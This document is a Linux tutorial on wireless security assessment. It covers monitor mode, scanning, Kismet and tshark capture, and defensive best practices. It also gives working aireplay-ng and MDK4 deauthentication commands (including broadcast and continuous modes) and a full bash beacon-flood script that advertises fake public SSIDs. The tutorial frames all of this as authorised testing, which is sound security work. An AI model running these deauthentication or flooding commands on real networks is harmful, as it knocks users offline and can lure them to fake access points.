Overview
This guide provides a comprehensive overview of tools and techniques used for wireless network security assessment, monitoring, and testing. It includes command-line utilities for Linux that security professionals use to assess wireless network security.
Note
This page has been updated in 2025 with current tools and techniques. Always ensure you have permission before using these tools on any network that isn't your own.
Wireless Security Assessment Toolkit
Common tools used for wireless network security assessment include:
| Tool | Purpose |
|---|---|
| aircrack-ng | Suite of tools for WiFi network security assessment |
| airodump-ng | Packet capture tool for wireless networks |
| aireplay-ng | Tool for packet injection and deauthentication |
| airmon-ng | Script for managing wireless interfaces in monitor mode |
| mdk3/mdk4 | Tool for wireless testing and attacks |
| wireshark | Network protocol analyzer with wireless capabilities |
| kismet | Wireless network detector and sniffer |
| iw | Modern command-line tool for wireless device configuration |
| iwconfig | Legacy tool for configuring wireless interfaces |
Wireless Interface Configuration
Determining Wireless Interface Capabilities
Before conducting any wireless assessment, you need to determine the capabilities of your network interface card (NIC):
# List wireless interfaces and their PHY numbers
airmon-ng
# Examine detailed capabilities of a specific wireless interface (replace phy0 with your PHY number)
iw phy phy0 info | grep -A8 modes
# Check if monitor mode is supported
iw phy phy0 info | grep -A8 "Supported interface modes"
# Check supported bands and frequencies
iw phy phy0 info | grep -A8 "Frequencies"
Enabling Monitor Mode
Monitor mode allows you to capture all wireless traffic without being associated with an access point:
# Check current wireless interfaces
ip link show
# Put interface into monitor mode using airmon-ng (recommended)
airmon-ng start wlan0
# Alternative method using iw (for newer kernels)
ip link set wlan0 down
iw dev wlan0 set type monitor
ip link set wlan0 up
Tip
After enabling monitor mode with airmon-ng, your interface will typically be renamed to something like mon0 or wlan0mon.
Wireless Network Scanning
Passive Scanning
Passive scanning listens for beacon frames without sending any probe requests, making it more stealthy:
# Passive scan using iw
iw dev wlan0 scan passive | grep SSID
# Comprehensive passive monitoring with airodump-ng
airodump-ng wlan0mon
Active Scanning
Active scanning sends probe requests to discover wireless networks:
# Active scan using iw
iw dev wlan0 scan | grep SSID
# Full active scan with detailed output
iw dev wlan0 scan
# Connect to a specific network (managed mode)
iwconfig wlan0 channel 6
iwconfig wlan0 essid "NetworkName"
iwconfig wlan0 mode managed
Deauthentication Techniques
Warning
Only use deauthentication techniques on networks you own or have explicit permission to test. Unauthorized use may be illegal in your jurisdiction.
Single Client Deauthentication
# Set interface to the target network's channel
iwconfig wlan0mon channel 6
# Send a single deauthentication packet
# -0 = deauthentication, 1 = number of packets, -a = AP MAC, -c = client MAC
aireplay-ng -0 1 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF wlan0mon
# Continuous deauthentication (use 0 for count)
aireplay-ng -0 0 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF wlan0mon
Broadcast Deauthentication
To deauthenticate all clients on a network:
# Omit the client MAC to deauthenticate all clients
aireplay-ng -0 10 -a 00:11:22:33:44:55 wlan0mon
Using MDK4 for Deauthentication
MDK4 (successor to MDK3) provides additional deauthentication capabilities:
# Basic deauthentication with MDK4
mdk4 wlan0mon d
# Deauthenticate with whitelist (everything not in file gets deauthenticated)
mdk4 wlan0mon d -w whitelist.txt
# Deauthenticate with blacklist (only MACs in file get deauthenticated)
mdk4 wlan0mon d -b blacklist.txt
Beacon Flood Techniques
Beacon flooding creates fake wireless networks, which can be used for testing wireless client behavior:
# Basic beacon flood on channel 11 using MDK4
mdk4 wlan0mon b -c 11 -f ssid_list.txt
Creating a Beacon Flood Script
Here's a more sophisticated script to automate beacon flooding:
#!/bin/bash
# Array of fake network names
networks=(
"FreeWifi"
"Corporate Guest"
"SecurityTest"
"Public WiFi"
"Hotel Guests"
"Airport_Free"
"Cafe Internet"
"ConferenceWiFi"
)
# Create SSID list file
if [ -f ssid_list.txt ]; then
echo "Removing existing SSID list"
rm -f ssid_list.txt
fi
echo "Creating list of network names"
for network in "${networks[@]}"; do
echo "$network" >> ssid_list.txt
done
# Check if monitor interface exists
if [[ -n $(iw dev | grep wlan0mon) ]]; then
echo "Monitor interface already exists"
else
echo "Starting monitor mode on wlan0"
airmon-ng start wlan0
fi
# Start beacon flood on channel 11
echo "Beginning beacon flood on wlan0mon"
mdk4 wlan0mon b -c 11 -f ssid_list.txt
Wireless Security Best Practices
As a security professional, it's important to understand these techniques to better protect networks:
- Use WPA3 encryption whenever possible
- Implement MAC address filtering (though not foolproof)
- Enable network isolation to segment guest and corporate networks
- Regularly audit connected devices
- Use enterprise authentication (802.1X) for corporate networks
- Implement wireless intrusion detection systems
- Consider disabling unused SSID broadcast
- Update access point firmware regularly
Wireless Network Analysis Tools
Beyond basic scanning, these tools provide deeper analysis:
Kismet
# Start Kismet with specified interface
kismet -c wlan0mon
# Save data to specific file
kismet -c wlan0mon -t network_scan
Wireshark
Wireshark provides deep packet inspection for wireless traffic:
# Capture wireless traffic with tshark (CLI version of Wireshark)
tshark -i wlan0mon -w capture.pcap
# Filter for specific traffic types
tshark -i wlan0mon -f "wlan type mgt subtype beacon" -w beacons.pcap